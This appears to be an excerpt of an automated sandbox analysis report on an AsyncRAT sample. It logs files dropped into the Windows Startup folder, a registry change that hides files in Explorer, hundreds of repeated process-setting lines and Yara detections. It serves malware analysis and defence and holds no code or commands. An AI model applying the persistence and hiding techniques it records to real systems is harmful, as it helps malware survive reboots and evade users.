            Source: C:\Users\user\AppData\Roaming\servieda.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeFile created: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\pgr.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeFile created: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeJump to dropped file

            Boot Survival:

            barindex
            Yara detected AsyncRATShow sources
            Source: Yara matchFile source: 0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.599252774.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: tmp87E4.tmp.exe PID: 5036, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe, type: DROPPED
            Source: Yara matchFile source: 12.0.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
            Drops PE files to the startup folderShow sources
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exeJump to dropped file
            Source: C:\Users\user\AppData\Roaming\servieda.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\servieda.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeJump to behavior

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Changes the view of files in windows explorer (hidden files and folders)Show sources
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_0040F64B memset,strcpy,memset,strcpy,strcat,strcpy,strcat,GetModuleHandleA,LoadLibraryExA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
            Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AsyncRATShow sources
            Source: Yara matchFile source: 0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.599252774.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: tmp87E4.tmp.exe PID: 5036, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe, type: DROPPED
            Source: Yara matchFile source: 12.0.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
